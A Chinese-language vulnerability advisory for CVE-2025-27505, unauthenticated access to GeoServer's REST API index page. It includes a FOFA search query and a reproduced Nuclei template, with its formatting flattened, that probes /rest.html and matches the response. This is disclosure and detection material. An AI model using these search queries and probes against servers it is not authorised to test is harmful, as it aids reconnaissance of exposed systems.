漏洞信息 漏洞名称: GeoServer REST API Index 未授权访问漏洞
漏洞编号:
漏洞类型: 未授权访问
漏洞等级: 中危
漏洞描述: GeoServer是一个开源的地理空间数据服务器,允许用户共享和编辑地理空间数据。它广泛应用于各种地理信息系统(GIS)应用中,支持多种数据格式和标准。此次发现的漏洞影响了GeoServer的REST API Index页面,该页面由于缺乏适当的授权检查,导致未授权用户可以访问敏感配置信息。
漏洞的具体原因在于GeoServer的REST API Index页面没有实施足够的访问控制措施,使得攻击者无需认证即可访问该页面。这种未授权访问漏洞(CWE-862)通常由于开发者在设计时未能正确实施权限验证机制所致。
此漏洞的中等严重性体现在它可能导致敏感信息泄露,包括但不限于服务器配置细节,这些信息可能被用于进一步的攻击。虽然漏洞不直接允许代码执行或服务中断,但泄露的信息可能增加系统面临其他攻击的风险。值得注意的是,此漏洞的利用不需要任何形式的认证,且可以通过网络远程触发,这使得它特别危险,尤其是在公开可访问的GeoServer实例中。
产品厂商: osgeo
产品名称: GeoServer
影响版本: *
搜索语法: app=”geoserver”
来源: https://github.com/projectdiscovery/nuclei-templates/blob/7f136b61652144bf7ba72fc0af7287cac25898df/http%2Fcves%2F2025%2FCVE-2025-27505.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 id: CVE-202 5-27505 info: name: GeoServer - Missing Authorization on REST API Indexauthor: securitytatersseverity: mediumdescription: |reference: - http:// geoserver.org/ - https://geoserver.org/vulnerability/2025/06/10/cve-disclosure.html - https://nvd.nist.gov/vuln/detail/CVE-2025-27505 classification: cvss-metrics: CVSS:3.1 / AV:N/ AC:L/ PR:N/ UI:N/ S:U/ C:L/ I:N/ A:Ncvss-score: 5.3 cve-id: CVE-202 5-27505 cwe-id: CWE-862 cpe: cpe:2.3 :a:geoserver:geoserver:* :* :* :* :* :* :* :* metadata: verified: true max-request: 2 fofa-query: app= "geoserver" shodan-query: http.title:"geoserver" vendor: osgeoproduct: geoservertags: cve,cve2025,geoserver,misconfig,osgeohttp: - method: GETpath: - "{{BaseURL}}/rest.html" - "{{BaseURL}}/geoserver/rest.html" stop-at-first-match: true matchers-condition: andmatchers: - type: wordpart: bodywords: - "Geoserver Configuration API" - type: wordpart: bodywords: - "about/status" - type: statusstatus: - 200